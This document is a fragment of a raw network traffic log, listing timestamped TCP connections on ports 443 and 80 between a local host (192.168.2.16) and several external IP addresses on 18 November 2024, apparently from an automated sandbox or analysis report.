                                                                                                                                          Nov 18, 2024 06:47:25.469553947 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.469573975 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.469588995 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.469660997 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.469813108 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.485054970 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.500096083 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.500112057 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.515042067 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.546020985 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.559572935 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.583726883 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.583920956 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.583966970 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.584022045 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.584045887 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.584116936 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.584153891 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.584249020 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.584574938 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.584583044 CET44355122104.18.95.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.584595919 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.584639072 CET55122443192.168.2.16104.18.95.41
                                                                                                                                          Nov 18, 2024 06:47:25.595180988 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595355988 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595438957 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595439911 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.595460892 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595535040 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.595541000 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595688105 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595767021 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595890999 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.595915079 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.595921993 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.596188068 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.601176977 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:25.601217985 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.601295948 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:25.601675034 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:25.601696968 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.609008074 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.616548061 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:25.616600037 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.616668940 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:25.617010117 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:25.617032051 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.639055014 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.639069080 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677320004 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677351952 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677392960 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677421093 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677421093 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.677444935 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677464962 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.677476883 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677490950 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.677505016 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.677524090 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.677582979 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.679060936 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.679080963 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.679162025 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.679177046 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.679250002 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.687159061 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.713638067 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.713826895 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.713923931 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.713995934 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.714010954 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.714162111 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.714167118 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.714412928 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.714477062 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.714483023 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.714828968 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.714915037 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.715018034 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.715023994 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.715080023 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.715296030 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.715507030 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.715682030 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.715745926 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.715753078 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.715816021 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.715823889 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.716295004 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.716345072 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.716358900 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.716624975 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.716706991 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.716712952 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.718491077 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.718574047 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.718580008 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.766055107 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.780198097 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.780286074 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:25.781471968 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:25.781481981 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.781826019 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.783097029 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:25.795469046 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.795535088 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.795581102 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.795602083 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.795640945 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.795680046 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.797430992 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.797477961 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.797544003 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.797552109 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.797621012 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.798911095 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.798953056 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.799043894 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.799050093 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.799101114 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.800081968 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.800153017 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.800158024 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.800240040 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.800297022 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.800471067 CET55123443192.168.2.16151.101.130.137
                                                                                                                                          Nov 18, 2024 06:47:25.800483942 CET44355123151.101.130.137192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.827327967 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833045006 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833329916 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833405972 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.833415031 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833488941 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833679914 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833683014 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.833709955 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.833796024 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.833825111 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.834096909 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:25.834244013 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.834398985 CET55124443192.168.2.16104.17.24.14
                                                                                                                                          Nov 18, 2024 06:47:25.834413052 CET44355124104.17.24.14192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.026751041 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.026906013 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.027013063 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:26.027720928 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:26.027740002 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.027754068 CET55125443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:26.027760029 CET44355125184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.219611883 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.219904900 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.219959021 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.221604109 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.221676111 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.222112894 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.222203016 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.222371101 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.222385883 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.236876011 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.237157106 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.237180948 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.238636971 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.238720894 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.239248991 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.239357948 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.239506960 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.239526033 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.273083925 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.288042068 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.364475012 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.364602089 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.364649057 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.364677906 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.364710093 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.364764929 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.364770889 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.365065098 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.365137100 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.365150928 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.365299940 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.365557909 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.365571022 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.414058924 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.414072037 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.462058067 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.483736038 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.483927965 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484008074 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484074116 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.484136105 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484209061 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.484366894 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484572887 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484648943 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.484664917 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484812975 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.484877110 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.484890938 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.485375881 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.485512018 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.485549927 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.485565901 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.485625982 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.485637903 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.485846043 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.485922098 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.485934973 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.486392975 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.486463070 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.486475945 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.486798048 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.486859083 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.486871004 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.526016951 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.526139975 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.526170969 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.532850027 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533037901 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533098936 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.533126116 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533301115 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533361912 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.533370018 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533723116 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533759117 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533793926 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.533802986 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.533848047 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.534053087 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.554950953 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.554982901 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.555059910 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.555320024 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.555330992 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.572062016 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.588047981 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.588059902 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.603893042 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.604295969 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.604368925 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.604389906 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.604418039 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.604482889 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.604517937 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.604700089 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.604763031 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.604922056 CET55126443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.604962111 CET44355126104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.635071039 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.652053118 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.652247906 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.652343035 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.652359962 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.652388096 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.652435064 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.652473927 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.652729988 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.652798891 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.652810097 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653170109 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653234959 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.653245926 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653441906 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653491974 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.653501034 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653637886 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653760910 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.653770924 CET44355127104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.653779984 CET55127443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.659168959 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.659226894 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:26.659843922 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.660038948 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:26.660064936 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.163291931 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.166424036 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.166454077 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.166930914 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.168622971 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.168716908 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.168962002 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.211349964 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.216032028 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.216348886 CET4968080192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:27.220009089 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:27.220061064 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.220155001 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:27.221101999 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:27.221132040 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.232981920 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.233071089 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:27.280060053 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:27.280428886 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.280764103 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.280797958 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.281932116 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.282767057 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.282905102 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.282917023 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.282953978 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.316514015 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.316644907 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.316749096 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.316836119 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.316900015 CET55129443192.168.2.16104.18.94.41
